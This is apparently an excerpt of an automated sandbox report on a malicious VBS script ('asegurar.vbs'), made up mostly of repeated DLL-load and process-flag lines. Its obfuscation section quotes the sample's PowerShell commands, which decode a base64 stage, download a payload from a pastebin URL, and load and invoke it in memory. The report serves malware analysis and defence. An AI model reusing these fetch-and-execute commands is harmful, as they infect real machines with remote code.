                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: asegurar.vbsStatic file information: File size 15016182 > 1048576

                    Data Obfuscation

                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: $IuJUJJZz = '[base64 payload omitted]';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;$global:?
                    Source: C:\Windows\System32\wscript.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = '[base64 payload omitted]';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 1_2_00007FFD9B9811ED pushad ; ret 1_2_00007FFD9B981232
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 3_2_00007FFD9B97113D pushad ; ret 3_2_00007FFD9B971192
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 3_2_00007FFD9B97DC93 push ebx; retf 3_2_00007FFD9B97DCBA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 3_2_00007FFD9B97DCC2 push ebx; retf 3_2_00007FFD9B97DCBA
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Code function: 6_2_00007FFD9B9B11A3 pushad ; ret 6_2_00007FFD9B9B11B2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Code function: 8_2_00457186 push ecx; ret 8_2_00457199
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Code function: 8_2_0041C7F3 push eax; retf 8_2_0041C7FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Code function: 8_2_00457AA8 push eax; ret 8_2_00457AC6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Code function: 8_2_00434EB6 push ecx; ret 8_2_00434EC9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Code function: 8_2_00406EEB ShellExecuteW,URLDownloadToFileW,8_2_00406EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Code function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe  Code function: 8_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,8_2_0041CBE1
                    Source: C:\Windows\System32\wscript.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
